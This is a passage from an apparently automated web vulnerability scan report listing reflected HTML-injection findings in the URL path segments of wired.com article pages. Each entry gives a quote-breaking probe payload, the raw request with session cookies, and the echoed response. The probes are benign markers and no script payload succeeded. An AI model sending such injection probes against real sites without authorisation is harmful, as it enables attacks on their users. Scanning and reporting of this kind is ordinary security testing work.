Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2776e"><a>2cf882d2876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2776e"><a>2cf882d2876/discoveries/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2776e"><a>2cf882d2876 ss_discoveries c_news">
...[SNIP]...

1.215. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cdc"><a>0cc65881279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries94cdc"><a>0cc65881279/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries94cdc"><a>0cc65881279 c_news">
...[SNIP]...

1.216. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7dad"><a>bdaa03d0efd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb7dad"><a>bdaa03d0efd/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb7dad"><a>bdaa03d0efd">
...[SNIP]...

1.217. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4a"><a>db634723549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science45d4a"><a>db634723549/discoveries/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:05 GMT
Date: Sun, 21 Nov 2010 23:10:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science45d4a"><a>db634723549 ss_discoveries c_news">
...[SNIP]...

1.218. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52754"><a>779fdc29594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries52754"><a>779fdc29594/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:34 GMT
Date: Sun, 21 Nov 2010 23:10:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries52754"><a>779fdc29594 c_news">
...[SNIP]...

1.219. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c53d"><a>70481f04aba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1c53d"><a>70481f04aba/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1c53d"><a>70481f04aba">
...[SNIP]...

1.220. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f61"><a>cb8010c293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee2f61"><a>cb8010c293b/discoveries/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:51 GMT
Date: Sun, 21 Nov 2010 23:09:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2f61"><a>cb8010c293b ss_discoveries c_news">
...[SNIP]...

1.221. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76756"><a>179b35b8b9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries76756"><a>179b35b8b9f/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries76756"><a>179b35b8b9f c_news">
...[SNIP]...

1.222. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0426

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6c7"><a>f3b3a70bcbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news7e6c7"><a>f3b3a70bcbe/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:37 GMT
Date: Sun, 21 Nov 2010 23:10:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news7e6c7"><a>f3b3a70bcbe">
...[SNIP]...

1.223. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e8c"><a>82286881d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science78e8c"><a>82286881d2/discoveries/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science78e8c"><a>82286881d2 ss_discoveries c_news">
...[SNIP]...

1.224. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82709"><a>31e9f734c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries82709"><a>31e9f734c89/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:08 GMT
Date: Sun, 21 Nov 2010 23:10:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries82709"><a>31e9f734c89 c_news">
...[SNIP]...

1.225. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0427

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59461"><a>c9541460a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news59461"><a>c9541460a9/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59461"><a>c9541460a9">
...[SNIP]...

1.226. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2efb"><a>fefb1eda5ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee2efb"><a>fefb1eda5ce/discoveries/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:15 GMT
Date: Sun, 21 Nov 2010 23:10:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2efb"><a>fefb1eda5ce ss_discoveries c_news">
...[SNIP]...

1.227. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a82"><a>54e3f66b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries60a82"><a>54e3f66b7a/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:39 GMT
Date: Sun, 21 Nov 2010 23:10:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries60a82"><a>54e3f66b7a c_news">
...[SNIP]...

1.228. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0503

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91895"><a>1c7fed98e1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news91895"><a>1c7fed98e1a/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:54 GMT
Date: Sun, 21 Nov 2010 23:10:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news91895"><a>1c7fed98e1a">
...[SNIP]...

1.229. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0515

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95176"><a>ea0344b1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science95176"><a>ea0344b1c10/discoveries/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
